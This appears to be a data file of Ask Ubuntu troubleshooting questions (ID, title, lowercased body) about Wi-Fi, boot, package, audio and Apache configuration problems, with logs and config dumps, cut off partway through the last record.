390523	unable to connect to my router but i can see the router	i have installed ubuntu on my wife , s hp pavlilon and i can see the router that we use but when i go to connect it will not connect to the router . i have tried to reset the router but it did not work . but my computer ( acer aspire ) can connect to the router with out issues . but when i first installed ubuntu on my wife 's hp i could not pick up the router with out being right on top of it . now i can see the router but unable to connect . i am a rather new ubuntu user . what can i do to get the router and my wife 's computer to connect ? what settings do i need ?
390525	i cant install skype , wine or play on linux	can anybody help ? i have been installing software and enjoying ubuntu for several months now , but currently have a problem . if i try to install some programs , such as wine , skype and playon linux as well as some others , i get error messages . the install goes well until the final phase of registering certs and then it fails and the programs do n't work . synaptice has n't helped much as it is where i get the error messages from while it is trying to install programs . errors look like this : updating certificates in /etc/ssl/certs ... ln : accessing â/etc/ssl/certs/entrust_root_certification_authority.pemâ : input/output error really do n't want to do a reinstall . surely this can be fixed without that . any help would be appreciated
390526	trouble with audio card	i have a asus xonar dg pci audio card . i am dual booting windows 7 and ubuntu 12.04. my card works for windows but i ca n't figure out how to get it to work in ubuntu , can someone help ? do i need drivers from somewhere ? thanks
390528	i have dual booted 12.04 and xp but it defaults to xp	first time seriously trying to daul boot . first time i failed i said ehhh . now i want to actually do it and i had a clean install of xp and installed kubuntu 12.04.3 ( got the fixed wubi.exe install it side-by-side and all the files were there ) . now i ran into the same problem on boot up . i just goes straight into xp . every forum i 've found has had it the other way around and the ubuntu forum talks about changing a line in the mbr but does n't say how or to what
390531	usb mouse and keyboard not working in xubuntu liveusb	i 'm at my wit 's end trying to get the latest version of xubuntu to run or install from a usb drive . here 's what happens : when i boot from the usb drive , i choose the 'try xubuntu ' option from the grub menu . xubuntu starts and i see the splash screen , then a few seconds later the desktop loads ... and that 's it . no keyboard or mouse control . i 'm using a usb keyboard and mouse , and the light on the mouse does n't even light up . however , i can tell the os is not frozen by watching the clock update each minute , and a few notices come and go such as network warnings . i 'm completely stumped . this is a new machine i recently assembled , and i know it works because i installed windows7 on a spare hd and it runs fine . also , the bios recognizes the keyboard and mouse . here 's my hardware info : motherboard - gigabyte 990fxa-ud5 cpu - amd sempron 145 video card - sapphire vapor-x r9 270x 2g gddr5 ram - 2 x 2gb of pc3 12800 usb drive - 16gb sandisk usb 3.0 as you can see , i 'm running fairly new hardware and xubuntu should easily run on this setup . as best i can tell , none of the hardware is faulty , and windows7 has been running normally for a few days . here 's what i 've done to troubleshoot : swap the ram swap the video card swap the usb drive boot from a cd install swap the keyboard & mouse try different versions of ubuntu & debian experiment with uefi and non-uefi options when trying different versions of linux , i have used the net install and full install and tried to proceed from there . but every time i get stuck on the 'choose a language ' screen , which seems odd . it 's almost as if xubuntu ( and others ) are not seeing my keyboard or mouse correctly . but the bios and windows recognize both without issue . does anyone have any ideas on what i can try next ? save me from windows !
390536	really strange behavior during boot . please help ... i do n't know where to start	my computer have dual boot , windows 8 ( pre-installed ) and ubuntu 12.04 on a random basis , i ca n't boot to ubuntu . i get to see the grub screen with all the booting options but sometimes , after the countdown ( or after pressing enter when the countdown does not appear ) the screen stays dark and nothing happens . after rebooting or running the live usb and rebooting again i can boot into ubuntu . i do n't know if the following has anything to do with this but a few days ago i configured the hybrid suspend option to be able to hibernate . the script shows like this : # always use suspend_hybrid instead of suspend if [ `` $ method '' = `` suspend_hybrid '' ] ; then method=suspend fi pm_hibernate_delay=300 # time in seconds until hibernate ( suspend to disk ) occurs ; 900 means 15 minutes '' i really ca n't tell if both things are related or not , but i think that this configuration might have caused some damage to my booting system . can anybody point me in what direction i should start looking for a solution ? thanks cecilia
390537	bcm4311 wifi not working	i installed ubuntu 12.04 on my laptop , but now my wifi does n't work . i installed the additional driver which was just the software modem . i do n't know what else to do about it except for installing the updates , but any time i try , it gets stuck configuring bcmwl-kernel source . this is my first experience with ubuntu and i have n't been working with computers for very long , so please speak in simple terms .
390562	apt-get is broken	when i do the following command , sudo dpkg -- configure -a i get the following error : setting up cpufreqd ( 2.4.2-2 ) ... * starting cpu frequency daemon cpufreqd *** buffer overflow detected *** : /usr/sbin/cpufreqd terminated ======= backtrace : ========= /lib/x86_64-linux-gnu/libc.so.6 ( __fortify_fail+0x5c ) [ 0x7f870ae661bc ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x111150 ) [ 0x7f870ae65150 ] /lib/x86_64-linux-gnu/libc.so.6 ( +0x1116f4 ) [ 0x7f870ae656f4 ] /usr/sbin/cpufreqd ( main+0x308 ) [ 0x402bb8 ] /lib/x86_64-linux-gnu/libc.so.6 ( __libc_start_main+0xf5 ) [ 0x7f870ad75ea5 ] /usr/sbin/cpufreqd [ 0x403c9d ] ======= memory map : ======== 00400000-0040b000 r-xp 00000000 08:01 8786172 /usr/sbin/cpufreqd 0060a000-0060b000 r -- p 0000a000 08:01 8786172 /usr/sbin/cpufreqd 0060b000-0060c000 rw-p 0000b000 08:01 8786172 /usr/sbin/cpufreqd 01793000-017b4000 rw-p 00000000 00:00 0 [ heap ] 7f870ab3e000-7f870ab52000 r-xp 00000000 08:01 11538071 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f870ab52000-7f870ad52000 -- -p 00014000 08:01 11538071 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f870ad52000-7f870ad53000 r -- p 00014000 08:01 11538071 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f870ad53000-7f870ad54000 rw-p 00015000 08:01 11538071 /lib/x86_64-linux-gnu/libgcc_s.so.1 7f870ad54000-7f870af13000 r-xp 00000000 08:01 11536374 /lib/x86_64-linux-gnu/libc-2.17.so 7f870af13000-7f870b112000 -- -p 001bf000 08:01 11536374 /lib/x86_64-linux-gnu/libc-2.17.so 7f870b112000-7f870b116000 r -- p 001be000 08:01 11536374 /lib/x86_64-linux-gnu/libc-2.17.so 7f870b116000-7f870b118000 rw-p 001c2000 08:01 11536374 /lib/x86_64-linux-gnu/libc-2.17.so 7f870b118000-7f870b11d000 rw-p 00000000 00:00 0 7f870b11d000-7f870b122000 r-xp 00000000 08:01 8786167 /usr/lib/libcpufreq.so.0.0.0 7f870b122000-7f870b321000 -- -p 00005000 08:01 8786167 /usr/lib/libcpufreq.so.0.0.0 7f870b321000-7f870b322000 r -- p 00004000 08:01 8786167 /usr/lib/libcpufreq.so.0.0.0 7f870b322000-7f870b323000 rw-p 00005000 08:01 8786167 /usr/lib/libcpufreq.so.0.0.0 7f870b323000-7f870b326000 r-xp 00000000 08:01 11536362 /lib/x86_64-linux-gnu/libdl-2.17.so 7f870b326000-7f870b525000 -- -p 00003000 08:01 11536362 /lib/x86_64-linux-gnu/libdl-2.17.so 7f870b525000-7f870b526000 r -- p 00002000 08:01 11536362 /lib/x86_64-linux-gnu/libdl-2.17.so 7f870b526000-7f870b527000 rw-p 00003000 08:01 11536362 /lib/x86_64-linux-gnu/libdl-2.17.so 7f870b527000-7f870b54a000 r-xp 00000000 08:01 11535446 /lib/x86_64-linux-gnu/ld-2.17.so 7f870b721000-7f870b724000 rw-p 00000000 00:00 0 7f870b746000-7f870b749000 rw-p 00000000 00:00 0 7f870b749000-7f870b74a000 r -- p 00022000 08:01 11535446 /lib/x86_64-linux-gnu/ld-2.17.so 7f870b74a000-7f870b74c000 rw-p 00023000 08:01 11535446 /lib/x86_64-linux-gnu/ld-2.17.so 7fff4ef22000-7fff4ef43000 rw-p 00000000 00:00 0 [ stack ] 7fff4effe000-7fff4f000000 r-xp 00000000 00:00 0 [ vdso ] ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [ vsyscall ] aborted invoke-rc.d : initscript cpufreqd , action `` start '' failed . dpkg : error processing cpufreqd ( -- configure ) : subprocess installed post-installation script returned error exit status 134 errors were encountered while processing : cpufreqd
390565	package dependencie error could not resolved	reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : aptitude : depends : libboost-iostreams1.46.1 ( > = 1.46.1-1 ) but it is not installable depends : libcwidget3 but it is not installable depends : libept1.4.12 but it is not installable recommends : libparse-debianchangelog-perl but it is not installable e : unable to correct problems , you have held broken packages .
390575	help with genius webcam	i 'm trying to get my islim 300x genius camera to work . lsusb : bus 003 device 002 : id 093a:262c pixart imaging , inc . there are no linux drivers on the genius website . i 've run `` kamoso '' but it does n't recognize the camera at all . also , i saw this in the syslog when plugin the camera : [ 6.964539 ] usbcore : registered new interface driver gspca_pac7302 how should i proceed ?
390578	my keyboard and mouse wo n't work once i 'm at the select language menu	i installed ubuntu 12.04 on my emachine today and once i got to the select language menu my keyboard and mouse would n't work . my keyboard worked fine during boot . i downloaded ubuntu off a flashdrive onto my computer so there could n't be a defect like one with a disk . i have tried un-plugging and plugging the mouse and kb back in but it did n't work . my kb does n't use usb but rather a circular plug in the rear of the computer . also the kb does n't work when in the unetbootin menu i select `` try ubuntu without installing '' . the kb and mouse only work for about a second after the background appears and all the lights on the kb go out . this is the first select language menu when ubuntu starts up . is there any way to fix this without getting a new kb ?
390579	dual boot with steamos , how to handle /home and accounts	my offspring is bullying me to install steamos ( and i 'm curious ) . we have and existing ubuntu 13.10 and free space for the steamos root . /home lives on its own partition . what i wonder : - can i use one /home for steamos and ubuntu or will the settings get in each other 's way ? - can i keep one set of logins only , so password changes affect both systems . my user count is low , so some manual extra steps when creating a user are ok . advice is greatly appreciated
390580	would like to get rid of new bar along the bottom of screen that shows active apps and workspaces	i just installed ubuntu 13.04 gnome desktop , then upgraded to 13.10 and added a shell extension to use custom themes . i played around with installing themes , and now i have a bar across the top of the screen ( which was there all along , and which i can find the settings for ) and a bar along the bottom - showing active apps and workspaces - that was not there before . i ca n't seem to get rid of it or find any settings for it - it 's not the gnome bottom taskbar , that one 's turned off ( and appears under this one if i turn it on ) . i would gladly post a screenshot but apparently i do n't rate .
390581	routing table taking long time to update for adhoc networks and olsr	i am using olsr to implement adhoc network and analyse the throughput.i have olsr working on 3 interconnected computers on adhoc network . i am using jperf to simulate and visualise the data transferred . initially all the nodes are connected and data is transferred from a to b.now in between of data transfer i block the mac of b on a.so , b will search and switch to another route through c.but this searching and switching is taking approximately 50-60 seconds whereas my understanding is that it should be done pretty soon ( like within 10 sec . ) .i tried to change the olsr.conf file and reduced hello message time interval but no improvement in output . can anyone help me where i am missing on this
390583	how to make unity icons enlarge on mouse over as with cairo dock ?	i have the cairo dock installed and i love it . when i mouseover the icons , they enlarge , gain focus , etc . is there a way to make the icons on the unity sidebar behave in that same manner ? i have installed ubuntu tweak , unity tweak , and even compiz . between those applications , i would think i could achieve my goal but i ca n't . is there a setting somewhere i am missing ? any help would be greatly appreciated .
390585	how to get help and to help with development of software	i am wanting to get some help with a project , and would love to help others . maybe be on a developer team even . i have looked at the different ubuntu sites . what site is the better of the sites ? also the sites do n't clearly say how to become one . any suggestions ?
390586	does anybody have ubuntu 13.10 working as a guest with bridged network in virtualbox 4.3.4 on windows 7 host ?	i have a ubuntu 13.10 installed as a guest on virtualbox 4.3.4 r91027 on a windows 7 host . when i use network mode nat , the ubuntu guest can access the internet . but when i change the networking mode to bridged , the ubuntu guest does not connect to internet and does not get a inet address . here is the ifconfig output for nat . eth0 link encap : ethernet hwaddr 08:00:27:0b : cc:7b inet addr:10.0.2.15 bcast:10.0.2.255 mask:255.255.255.0 inet6 addr : fe80 : :a00:27ff : fe0b : cc7b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:89652 errors:0 dropped:0 overruns:0 frame:0 tx packets:42366 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:107627599 ( 107.6 mb ) tx bytes:3037228 ( 3.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1584 errors:0 dropped:0 overruns:0 frame:0 tx packets:1584 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:154254 ( 154.2 kb ) tx bytes:154254 ( 154.2 kb ) here is the same output for bridged network . eth0 link encap : ethernet hwaddr 08:00:27:0b : cc:7b inet6 addr : fe80 : :a00:27ff : fe0b : cc7b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:89652 errors:0 dropped:0 overruns:0 frame:0 tx packets:42383 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:107627599 ( 107.6 mb ) tx bytes:3040704 ( 3.0 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1584 errors:0 dropped:0 overruns:0 frame:0 tx packets:1584 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:154254 ( 154.2 kb ) tx bytes:154254 ( 154.2 kb )
390587	i do n't know how to upgrade 12.10 to 13.04 or 13.10	i try to use upgrade app to upgrade , but the app tell me i can upgrade 13.10 directly . but , if i press upgrade button , then the error message occured like ... an upgrade from 'quantal ' to 'saucy ' is not supported with this tool . so , i try to upgrade with terminal by sudo do-release-upgrade but , same error message occured . i using 12.10 now . i want to upgrade to 13.10 , but i ca n't upgrade 13.10 , and 13.04 . -- -- -- add -- -- -- i installed ubuntu 12.04 with windows installer , and i upgraded this to 12.10 .
390588	ubuntu 12.4.3 wo n't display grub screen at boot -then crashes [ solved ]	i 'm having problems installing ubuntu 12.4.3 alongside windows 7 on an athlon ii desktop . each time i 've gone through the install process everything seems in order . when i try and first boot the pc from the hard drive i get error messages from the screen such as input not supported ( acer ) and wrong frequency ( dell ) . i can run the ubuntu live disk okay . but i ca n't boot normally to either op system . i think the problem is with grub , but i do n't know how to set the [ refresh rate ? ] for the screen so the computer does n't lock as it does now . has anyone had a similar problem ? edit : after some thought , i 've reset the system bios to defaults . now i 'm back online ! !
390590	black screen ( with mouse arrow movable ) for a long time before desktop starts	after i log in , sometimes ( often ) the screen goes black and the graphical mouse arrow appears , and it can be moved with the mouse , but nothing else happens for quite a long time ( maybe a minute ) and then the desktop will finally appear . this is using ubuntu 13.10 - amd phenom ( tm ) ii x4 945 processor ă 4 - 8 gib ram - geforce gtx 550 ti/pcie/sse2/3dnow ! - 32 bit
390592	how add mono to my path ?	i want to install monodevelop-4.2.1 from source under ubuntu 12.4.3 but when i execute : ./configure -- prefix=pkg-config -- variable=prefix mono it shows me that : configure : error : ca n't find `` mono '' in your path how could i add it to my path ?
390593	offset internal temprature	using `` hardware sensors indicator , '' i determined that , even when sitting in a room at room temperature ( ~75-78 degrees f ) it thought that my temperature internally is 136 . this ca n't be right.it does n't even feel warm . even when starting from an overnight shutdown , the fan runs and continually gets faster , most likely because what it thinks is the internal temperature . how do i fix this ?
390598	e5151 huawei modem installation	can somebody help me with the installation of e5151 huawei modem for ubuntu . i am absolutely a beginner . so very detailed and simple steps would be helpful . regards , anujit
390599	sound not working on ubuntu 13.10	i recently updated to ubuntu 13.10 . for 2-3 days , audio worked well and after that it stopped . i ca n't hear anything through my headphones or through my speakers . i tried all the possible solutions shown at ask ubuntu forum but still i could n't resolve it . as soon as i insert my headphone into the audio jack , on the right top side of the ubuntu , a small speaker icon with mute symbol is shown . i ca n't get rid of that mute symbol however i try ( please note this speaker with mute symbol is not the same speaker symbol shown on the panel on top right side ) . is there a possible solution to fix this ? thank you .
390601	new to ubuntu - dell vostro 1510 - wifi problem	i have just installed ubuntu on my laptop ( dell vostro 1510 ) as a side to my windows 7 . i am quite new to ubuntu and do not have any experience with linux . after installing ubuntu , i tried using system settings > hardware > additional hardwares to find the driver for my laptop 's wifi but it did n't work . i appreciate if you can help me solving this problem . amir
390603	encoding and syncing music folder	i need to synchronize my local music folder to an external ftp server . normally i would something like freefilesync , but i need the music files to be encoded before syncing . are there any options ?
390604	forbidden error when accessing localhost after updating php	i wanted to install php 5.5 on my machine and so i followed this tutorial : http : //www.dev-metal.com/how-to-setup-latest-version-of-php-5-5-on-ubuntu-12-04-lts/ i executed the following commands : sudo add-apt-repository ppa : ondrej/php5 sudo apt-get update sudo apt-get install php5 now my php version is php 5.5.7 . but the commands above prompted me if i wanted to install the apache version that comes with the repository so i chose yes . but now when i access localhost i 'm getting a forbidden error . here 's what my apache2.conf looks like : # this is the main apache server configuration file . it contains the # configuration directives that give the server its instructions . # see http : //httpd.apache.org/docs/2.4/ for detailed information about # the directives and /usr/share/doc/apache2/readme.debian about debian specific # hints . # # # summary of how the apache 2 configuration works in debian : # the apache 2 web server configuration in debian is quite different to # upstream 's suggested way to configure the web server . this is because debian's # default apache2 installation attempts to make adding and removing modules , # virtual hosts , and extra configuration directives as flexible as possible , in # order to make automating the changes and administering the server as easy as # possible . # it is split into several files forming the configuration hierarchy outlined # below , all located in the /etc/apache2/ directory : # # /etc/apache2/ # | -- apache2.conf # | ` -- ports.conf # | -- mods-enabled # | | -- *.load # | ` -- *.conf # | -- conf-enabled # | ` -- *.conf # ` -- sites-enabled # ` -- *.conf # # # * apache2.conf is the main configuration file ( this file ) . it puts the pieces # together by including all remaining configuration files when starting up the # web server . # # * ports.conf is always included from the main configuration file . it is # supposed to determine listening ports for incoming connections which can be # customized anytime . # # * configuration files in the mods-enabled/ , conf-enabled/ and sites-enabled/ # directories contain particular configuration snippets which manage modules , # global configuration fragments , or virtual host configurations , # respectively . # # they are activated by symlinking available configuration files from their # respective *-available/ counterparts . these should be managed by using our # helpers a2enmod/a2dismod , a2ensite/a2dissite and a2enconf/a2disconf . see # their respective man pages for detailed information . # # * the binary is called apache2 . due to the use of environment variables , in # the default configuration , apache2 needs to be started/stopped with # /etc/init.d/apache2 or apache2ctl . calling /usr/bin/apache2 directly will not # work with the default configuration . # global configuration # # # serverroot : the top of the directory tree under which the server's # configuration , error , and log files are kept . # # note ! if you intend to place this on an nfs ( or otherwise network ) # mounted filesystem then please read the mutex documentation ( available # at < url : http : //httpd.apache.org/docs/2.4/mod/core.html # mutex > ) ; # you will save yourself a lot of trouble . # # do not add a slash at the end of the directory path . # # serverroot `` /etc/apache2 '' # # the accept serialization lock file must be stored on a local disk . # mutex file : $ { apache_lock_dir } default # # pidfile : the file in which the server should record its process # identification number when it starts . # this needs to be set in /etc/apache2/envvars # pidfile $ { apache_pid_file } # # timeout : the number of seconds before receives and sends time out . # timeout 300 # # keepalive : whether or not to allow persistent connections ( more than # one request per connection ) . set to `` off '' to deactivate . # keepalive on # # maxkeepaliverequests : the maximum number of requests to allow # during a persistent connection . set to 0 to allow an unlimited amount . # we recommend you leave this number high , for maximum performance . # maxkeepaliverequests 100 # # keepalivetimeout : number of seconds to wait for the next request from the # same client on the same connection . # keepalivetimeout 5 # these need to be set in /etc/apache2/envvars user $ { apache_run_user } group $ { apache_run_group } # # hostnamelookups : log the names of clients or just their ip addresses # e.g. , www.apache.org ( on ) or 204.62.129.132 ( off ) . # the default is off because it 'd be overall better for the net if people # had to knowingly turn this feature on , since enabling it means that # each client request will result in at least one lookup request to the # nameserver . # hostnamelookups off # errorlog : the location of the error log file . # if you do not specify an errorlog directive within a < virtualhost > # container , error messages relating to that virtual host will be # logged here . if you *do* define an error logfile for a < virtualhost > # container , that host 's errors will be logged there and not here . # errorlog $ { apache_log_dir } /error.log # # loglevel : control the severity of messages logged to the error_log . # available values : trace8 , ... , trace1 , debug , info , notice , warn , # error , crit , alert , emerg . # it is also possible to configure the log level for particular modules , e.g . # `` loglevel info ssl : warn '' # loglevel warn # include module configuration : includeoptional mods-enabled/*.load includeoptional mods-enabled/*.conf # include list of ports to listen on include ports.conf # sets the default security model of the apache2 httpd server . it does # not allow access to the root filesystem outside of /usr/share and /var/www . # the former is used by web applications packaged in debian , # the latter may be used for local directories served by the web server . if # your system is serving content from a sub-directory in /srv you must allow # access here , or in any related virtual host . < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > # < directory /srv/ > # options indexes followsymlinks # allowoverride none # require all granted # < /directory > # accessfilename : the name of the file to look for in each directory # for additional configuration directives . see also the allowoverride # directive . # accessfilename .htaccess # # the following lines prevent .htaccess and .htpasswd files from being # viewed by web clients . # < filesmatch `` ^\.ht '' > require all denied < /filesmatch > # # the following directives define some format nicknames for use with # a customlog directive . # # these deviate from the common log format definitions in that they use % o # ( the actual bytes sent including headers ) instead of % b ( the size of the # requested file ) , because the latter makes it impossible to detect partial # requests . # # note that the use of % { x-forwarded-for } i instead of % h is not recommended . # use mod_remoteip instead . # logformat `` % v : % p % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' vhost_combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o \ '' % { referer } i\ '' \ '' % { user-agent } i\ '' '' combined logformat `` % h % l % u % t \ '' % r\ '' % > s % o '' common logformat `` % { referer } i - > % u '' referer logformat `` % { user-agent } i '' agent # include of directories ignores editors ' and dpkg 's backup files , # see readme.debian for details . # include generic snippets of statements includeoptional conf-enabled/*.conf # include the virtual host configurations : includeoptional sites-enabled/*.conf # vim : syntax=apache ts=4 sw=4 sts=4 sr noet and my 000-default.conf file under the etc/apache2/sites-available : < virtualhost *:80 > servername my.dev serveradmin webmaster @ localhost documentroot /home/me/web_files < directory / > options followsymlinks allowoverride none < /directory > < directory /home/me/web_files/ > options indexes followsymlinks multiviews allowoverride all order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > either my.dev or localhost results in forbidden error . i already tried : sudo chmod -r 777 me/web_files and restarted apache but it does n't work . any ideas ? is it possible that i 'm looking at the wrong files ? thanks in advance update from my error log i got this : [ sat dec 14 14:39:49.298657 2013 ] [ mpm_prefork : notice ] [ pid 12640 ] ah00169 : caught sigterm , shutting down [ sat dec 14 14:39:50.503543 2013 ] [ mpm_prefork : notice ] [ pid 13012 ] ah00163 : apache/2.4.6 ( ubuntu ) php/5.5.7-1+sury.org~raring+1 openssl/1.0.1c configured -- resuming normal operations [ sat dec 14 14:39:50.503631 2013 ] [ core : notice ] [ pid 13012 ] ah00094 : command line : '/usr/sbin/apache2' [ sat dec 14 14:40:01.060112 2013 ] [ authz_core : error ] [ pid 13016 ] [ client 127.0.0.1:44960 ] ah01630 : client denied by server configuration : /home/me/web_files /
390608	unable to mount iso in write mode	i tried to mount my ubuntu 13.04 64-bit image using the following command : sudo mount -o rw , loop /home/varun/downloads/ubuntu-13.04-desktop-amd64.iso /media/cdimage but i gets the following warning : mount : warning : /media/cdimage seems to be mounted read-only . help me to eliminate the warning .
390613	how to update an iso image using jigdo ?	i am trying to update the iso image of ubuntu using jigdo . can any one explain the exact way to do this ?
390615	wired connection suddenly stopped working	here is the thing ! am on day 5 of no wired internet connection . i have spent the last 4 days searching through every forum and q & a sites , until i finally decided to post this , so i have done my homework . before i take my laptop to maintenance shop for hardware failures i want to check with you guys first . problem description : like the question says my wired connection stopped working suddenly after an update . i am using ubuntu 12.04 lts . network manager says wired networks disconnected . wireless is working perfectly . and also it does n't work on windows 7 too , it says cable unplugged . i have tried the cable on other computer and it works perfectly . nm-tool output : networkmanager tool state : connected ( global ) - device : wlan0 [ connectify-me ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 9c:4e:36:29 : f7 : d4 capabilities : speed : 58 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) tp-link_8ab114 : infra , a0 : f3 : c1:8a : b1:14 , freq 2452 mhz , rate 54 mb/s , strength 25 wpa2 zte_hg_0 : infra , 00:1d:0f : bf : be:61 , freq 2437 mhz , rate 54 mb/s , strength 47 zte_hg_0 : infra , 00:21:27 : c1:19 : d9 , freq 2437 mhz , rate 54 mb/s , strength 39 *connectify-me : infra , e8:39 : df:3e : af:8e , freq 2462 mhz , rate 54 mb/s , strength 87 wpa2 ipv4 settings : address : 192.168.241.104 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.241.1 dns : 192.168.241.1 - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : atl1c state : unavailable default : no hw address : 00:1e : de : f7 : a6 : c9 capabilities : carrier detect : yes wired properties carrier : off sudo lshw -c network output : *-network description : ethernet interface product : ar8152 v2.0 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : c1 serial : 00:1e : de : f7 : a6 : c9 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:48 memory : f7e00000-f7e3ffff ioport : e000 ( size=128 ) *-network description : wireless interface product : centrino wireless-n 2200 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : c4 serial : 9c:4e:36:29 : f7 : d4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-57-generic firmware=18.168.6.1 ip=192.168.241.104 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:46 memory : f7d00000-f7d01fff ifconfig eth0 output : eth0 link encap : ethernet hwaddr 00:1e : de : f7 : a6 : c9 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:48 so there you have it guys ! let me know if you need additional information . so please help me ! ! !
390616	how to uninstall a windows program from wine ?	i have installed several windows programs using wine . the problem is that i wont to uninstall some of them because i do n't need them . and i wont to that without affecting the windows apps that i wont to keep . but i ca n't see any way to uninstall them ! even if i explore drive c trough wine i ca n't find any unistall.exe file for them although i can find the install.exe please , help me in this , even if it may sound childish . i think i ca n't find the solution because i am still influenced by some kind of `` windows mentality '' wich makes me blind to such an easy solution . thanks !
390620	gnome menus are much faster as thin than as fat clients , on pentium 4 , 2.00 ghz pcs	this is a ubuntu 12.04 ltsp lab setup . the lab specs are : server : intel pentium g645 @ 2,9 ghz με 4 gb ram gigabit switch : tp-link 24+2g unmanaged gigabit-uplink switch gigabit net card : tp-link tg-3468 when i setup the above pcs ( pentium 4 , 1.7 ghz or 2.00 ghz ) as fat clients , the gnome ( fallback ) menus are too slow , much slower than even pentium 2 thin clients . especially when i move to the seconf level menu ( ie applications → office ) . when i configure them as thin clients , the menus become fast again . these are some tests i have made : the firefox menus are also much slower on the fat clients . the librewriter menus seem to have no difference , thin or fat . p4-1.7 ghz when started from live-cd , behaves almost the same as the same pc with fat client configuration ( of course it is slower when reading from the cd ) . therefore this seems to be a ubuntu and not a ltsp problem . tests with newer kernel , did not help . p4-2.3 ghz fat and above have acceptable speed . i have seen other labs with p4-2.00 ghz fat clients and their speed is much higher than my clients . my fat clients have the sis vga card built-in the motherboard . in one of the tests i put a nvidia vga card and the fat client became fast . i thought i found the solution , but now the speed is lost again , maybe we changed something when we changed kernel back and forth , or i made some other mistake .
390622	folders gone after moving to an other drive	i just tried to move some folders from one disk in my server to another , i tried just draged them to the other space on the disk . now cant i see any folder at any of the spaces . but i can see that the space is used on the first folder . so i am convinced that they are still there , but how can i show them .
390623	youtube videos do n't fullscreen in ubuntu 13.10	when i watch a video in youtube the full screen option does n't work , i 'm using firefox in ubuntu 13.10 . why ?
390626	bluetooth headset never gives me sound options	i have buffalo headset with microphone that i know works fine becaue i routinely use it on a windows 7 computer . it connects to my ubuntu 13.10 computer fine : but when i open sound preferences , there is no sound device related to the buffalo headset ( the kenwood is just a usb speaker system ) : my computer usually sends audio to a pulseaudio on another machine where the speakers are connected , as per this answer . i had to make an additional tweak to repair an issue with flash audio , as per this answer . essentially , i needed to add the following line to my /etc/environment file : pulse_server=192.168.0.4:4713 i 'm willing to reconfigure any of this if it will allow me to but run use a network audio server , and also get my bluetooth headset to connect . how do i get my bluetooth headset to work in ubuntu 13.10 ? requested command line output : dave @ homebase ~ $ pacmd list-modules | grep bluetooth no pulseaudio daemon running , or not running as session daemon . dave @ homebase ~ $ dpkg -l *bluetooth* desired=unknown/install/remove/purge/hold | status=not/inst/conf-files/unpacked/half-conf/half-inst/trig-await/trig-pend |/ err ? = ( none ) /reinst-required ( status , err : uppercase=bad ) ||/ name version architecture description +++-==============-============-============-================================= ii bluetooth 4.101-0ubunt all bluetooth support ii cinnamon-bluet 3.8.2+petra amd64 gnome bluetooth support for the c ii gir1.2-gnomebl 3.8.1-2ubunt amd64 introspection data for gnomebluet ii gnome-bluetoot 3.8.1-2ubunt amd64 gnome bluetooth tools ii indicator-blue 0.0.6+13.10 . amd64 system bluetooth indicator . ii libbluetooth3 : 4.101-0ubunt amd64 library to use the bluez linux bl ii libgnome-bluet 3.8.1-2ubunt amd64 gnome bluetooth tools - support l ii libmatebluetoo 1.6.0-2+petr amd64 mate bluetooth tools ( library ) ii mate-bluetooth 1.6.0-2+petr amd64 mate bluetooth tools ii pulseaudio-mod 1:4.0-0ubunt amd64 bluetooth module for pulseaudio s dave @ homebase ~ $ grep bluetoothd /var/log/syslog dec 14 15:57:20 homebase bluetoothd [ 